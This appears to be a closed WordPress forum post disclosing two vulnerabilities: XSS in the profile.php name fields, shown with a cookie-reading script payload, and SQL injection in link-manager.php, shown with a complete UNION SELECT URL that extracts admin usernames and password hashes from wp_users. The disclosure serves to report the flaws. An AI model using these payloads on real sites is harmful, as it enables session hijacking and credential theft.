XSS-Attack in wp-admin/profile.php & SQL bug in wp-admin/link-manager.php
-
==XSS==
Module: wp-admin/profile.php
Fileds: Last Name, First Name.
You can enter some bad html-code like <script>alert(document.cookie)</script>
in this fields.
Description and path:
http://adz.void.ru/?p=5
(C) ADZ Security Team
==SQL==
Module: wp-admin/link-manager.php
Example:
http://wordpress-site.org/wp-admin/link-manager.php?link_id=31337%20UNION%0SELECT%20ID%20as%20link_id,user_login%20AS%20link_url,user_pass%20AS%20link_name,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL%20FROM%20wp_users%20WHERE%20user_level=10&action=linkedit
Description and path:
http://adz.void.ru/?p=6
(C) ADZ Security Team
==CONTACT==
http://adz.void.ru
kre0n@mail.ru
icq: 332757541
irc: #adz @ irc.uvao.net
The topic ‘XSS-Attack in wp-admin/profile.php & SQL bug in wp-admin/link-manager.php’ is closed to new replies.